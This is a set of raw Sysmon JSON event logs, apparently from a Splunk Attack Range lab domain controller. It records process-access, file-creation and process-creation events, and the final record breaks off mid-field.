{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4884,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4885,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4886,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4887,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4888,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4889,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.412\r\nSourceProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A36F0600}\r\nSourceProcessId: 1492\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C2-5F25-0000-001001C00600}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.412","SourceProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A36F0600}","SourceProcessId":"1492","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C2-5F25-0000-001001C00600}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4890,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:54:58.412\r\nProcessGuid: {E2A3D6B1-11C2-5F25-0000-0010E7BB0600}\r\nProcessId: 4416\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\jdhvqrm5\\jdhvqrm5.dll\r\nCreationUtcTime: 2020-08-01 06:54:58.286","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:54:58.412","ProcessGuid":"{E2A3D6B1-11C2-5F25-0000-0010E7BB0600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\jdhvqrm5\\jdhvqrm5.dll","CreationUtcTime":"2020-08-01 06:54:58.286","EventReceivedTime":"2020-08-01 06:54:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4891,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.521\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.521","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4892,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.928\r\nProcessGuid: {E2A3D6B1-11C2-5F25-0000-001028C60600}\r\nProcessId: 3468\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.928","ProcessGuid":"{E2A3D6B1-11C2-5F25-0000-001028C60600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT 